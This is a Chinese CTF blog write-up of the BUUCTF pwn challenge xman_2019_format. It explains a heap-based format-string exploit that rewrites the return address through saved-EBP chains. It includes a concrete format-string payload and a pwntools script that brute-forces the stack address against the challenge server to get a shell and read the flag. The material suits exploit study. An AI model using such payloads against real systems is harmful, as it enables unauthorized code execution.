xman_2019_format

已于 2022-02-16 22:55:12 修改
阅读量339 收藏 2
点赞数 3
分类专栏: buuctf 题目 文章标签: pwn
于 2022-02-16 22:27:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/122972488
版权
本文介绍了在xman_2019_format中,如何通过利用栈上的间接调用来实现backdoor,包括修改返回地址、利用Ebp链和栈内存布局。重点讲述了爆破栈地址、修改指令字节和使用特定格式化指令来达到攻击目的的过程。
摘要由CSDN通过智能技术生成

xman_2019_format

查看保护
在这里插入图片描述
在这里插入图片描述
一层一层的跟进之后可以看见有两个格式化的功能。中间使用|来隔开
在这里插入图片描述
还有个比较关键的是格式化在堆上,并不在栈上所以平时的的栈上格化式没有什么用。
在这里插入图片描述
正常的方法的话没有用,这时可以借助ebp两个链子来改ret为backdoor
因为返回地址的指针的最后一为是0xc所以把ebp第一个链子最低的一个字节改成0xcc,偏移为10。
为什么要改为0xcc呢,可以看一下笔者这里的栈图,返回地址前面是d3cc,而第一个ebp链子是d3a8往后。这里的话其实得要进行爆破,因为栈的地址会变,最后一位不会变,倒数第二个会变。所以需要进行一个爆破。
之后还需要借助第二个ebp链子。因为要将0x804897改为backdoor的地址,而这两个地址不一样的只有最后两个字节,改最后两个字节即可。
%204c%10$hhn|%34219c%18$hn
解释一下吧,204是0xcc因为最低位为0xc,倒数第二个的话这里按着笔者这里的栈图来的是0xcc,倒数第二位是c所以这里作者设置的是0xcc。%10是因为偏移10
34219是backdoor的最低的两个字节。偏移为18

from pwn import *

#context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'
'''
debug = 0
if debug:
    r = remote()
else:
    r = process(file_name)
'''
elf = ELF(file_name)

def dbg():
    gdb.attach(r)

for i in range(20):
    r = remote('node4.buuoj.cn', 25377)
    p1 = '%204c%10$hhn|%34219c%18$hn'
    r.sendline(p1)

    try:
        r.sendline(b'echo aaaa')
        r.recvuntil(b'aaaa', timeout=1)
        r.sendline(b'cat flag')
        r.recvuntil(b'{')
        flag = b'flag{' + r.recvuntil(b'}')
        print('[+] flag = ' + str(flag))
        r.interactive()
        break
    except:
        r.close()
        continue

在这里插入图片描述

z1r0.
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF-PWN刷题记录-18(格式化字符串漏洞)
weixin_44145820的博客
05-08 1766
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt(字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
ctf解密图片得到flag_CTF中图片隐写的一些整理总结
weixin_39983223的博客
12-20 8177
对历年来国内外CTF中常见的题型图片隐写的一些总结,本文长期更新,及时补充新的题型。对历年来国内外CTF中常见的题型图片隐写的一些总结赛题XMAN-qualifiers-2017 : Misc/SimpleGIf考察点Gif文件头隐写相关技巧Python 脚本编写工具010EditorLinux identify命令Visual Studio Code附件WriteupGIF头补全首先用file查...
[BUUCTF-pwn]——xman_2019_format
Y_peak的博客
03-30 551
[BUUCTF-pwn]——xman_2019_format 本小白终于想明白了, 第一个写出来这道题的人, 好厉害感觉. 脑袋嗡嗡的, 这道题让我想了一个上午竟然, 果然适当睡眠有助于思考, 睡一觉就想出来了. 也看过几个题解不过,虽然解法相同,但是基本都木有将清楚, 每一步的原因是什么都木有说清楚. peak不才, 在这里试着详细说明一下, 毕竟想了一个上午的东西,还是有必要好好总结一下的 . peak小知识 ALSR : 你们肯定都知道,不就是地址随机化嘛有什么, 但是这道题如果你们不清楚具体的原理
[BUUCTF]PWN——xman_2019_format(堆上的fmt+爆破栈)
mcmuyanga的博客
03-22 628
xman_2019_format 例行检查,32位程序,开启了nx 检索程序里的字符串,发现了后门函数,back_doorr=0x80485AB 这题buf并不存储在栈上,而是在malloc申请的堆上 之后buf作为参数,进入到sub_80485C4 由于存在后门函数,可以利用格式化字符串将返回地址改为back_door 这边主要利用了%ac$bn,将长度a的数据写入偏移为b的位置。 格式化字符串漏洞,一般需要先泄露栈地址,然后计算偏移,但是这里没办法这么利用,因为这里的s存放在chunk上,不在
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
这可以通过使用WASM解析工具如`wasm2wat`或` Binaryen`来完成,将二进制WASM转换为更易读的Wat(WebAssembly Text Format)格式。 2. 理解函数逻辑:WASM中的函数由操作码(opcodes)组成,这些操作码对应于基本的...
图片隐写 安恒ctf_CTF中图片隐写的一些整理总结
weixin_33626238的博客
12-30 2131
对历年来国内外CTF中常见的题型图片隐写的一些总结,本文长期更新,及时补充新的题型。对历年来国内外CTF中常见的题型图片隐写的一些总结赛题XMAN-qualifiers-2017 : Misc/SimpleGIf考察点Gif文件头隐写相关技巧Python 脚本编写工具010EditorLinux identify命令Visual Studio Code附件WriteupGIF头补全首先用file查...
图片隐写 安恒ctf_图片隐写 安恒ctf_CTF中图片隐写的一些整理总结
weixin_35012535的博客
02-05 1674
对历年来国内外CTF中常见的题型图片隐写的一些总结,本文长期更新,及时补充新的题型。对历年来国内外CTF中常见的题型图片隐写的一些总结赛题XMAN-qualifiers-2017 : Misc/SimpleGIf考察点Gif文件头隐写相关技巧Python 脚本编写工具010EditorLinux identify命令Visual Studio Code附件WriteupGIF头补全首先用file...
Xman非常好用
07-30
请勿在未经授权的情况下上传任何涉及著作权侵权的资源,除非该资源完全由您个人创作
xman_2019_format(非栈上格式化字符串仅一次利用的爆破)
m0_51251108的博客
11-10 678
xman_2019_format: 看名字是格式化字符串 checksec一下 在printf处 程序分析: 有个后门 想着就是把printf,劫持为后门
xman_2019_format(非栈上格式化字符串仅一次利用的爆破)
seaaseesa的博客
04-30 1508
xman_2019_format 首先检查一下程序的保护机制 然后用IDA分析一下 存在一个后门函数 s执行的内存是非栈上,这类格式化字符串漏洞,一般需要先泄露栈地址,但是这里无法做到,如果泄露了,第二次也没机会来再次利用了。因为这里是一次输入,分步执行。没有循环的交互。因此,最简单的方法是爆破栈的低1字节。通过栈上已有的数据,在栈上布下一个指向函数返回地址栈的指针,然后劫持返回地...
BUUCTF之“xman_2019_format”之特殊剧情:当格式化字符串遇上堆
Probeginner的博客
12-24 469
格式化字符串在遇到堆的情况
xmanctf_2019_crypto_cycle_write_up
WaterDemo22的专栏
12-31 567
一道xmanctf逆向题目的解答 周末试了试xmanctf的题目,试了一下crypto的cycle那一题,逻辑逆向难度不是很大。主要是对于逆向出来对逻辑,整理成解题思路的过程有点繁琐,需要对程序的精细化处理。分为三个步骤:编码、跳表处理和约束求解,具体分析如下。 编码 对输入字符进行编码,编码算法是: 关键逻辑是有两个: v2 = byte_202020[i] + v4 –s s[i]...
某道Pwn(格式化字符串漏洞)
热门推荐
龙哥盟
03-18 4万+
格式化字符串漏洞近几年出现频率少了,但是一些 CTF 中还有涉及,就当玩玩好了。首先看这一段代码,什么比赛的题我忘了:#include <stdio.h> int main(void) { int flag = 0; int *p = &flag; char a[100]; scanf("%s",a); printf(a); if(flag ==
matlab程序模拟单个正电荷电位下的电子轨迹.rar
09-10
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
医药生物:创新药、“AI 医疗”有望引领医药产业新发展(1).pdf
最新发布
09-10
医药生物:创新药、“AI 医疗”有望引领医药产业新发展(1)
飞利浦4H.09C02.A11电源板电路图.rar
09-10
飞利浦4H.09C02.A11电源板电路图
XMAN := xman -prj ${PRJ_NAME}详细解释解释上述makefile
04-28
这是一个 Makefile 中的变量赋值语句,它将 xman 变量的值设置为 `${PRJ_NAME}` 变量的值,并在变量名称前添加了 `-prj` 前缀。这个 Makefile 似乎是为了某个工程项目(即 `${PRJ_NAME}`)而编写的,XMAN 变量可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值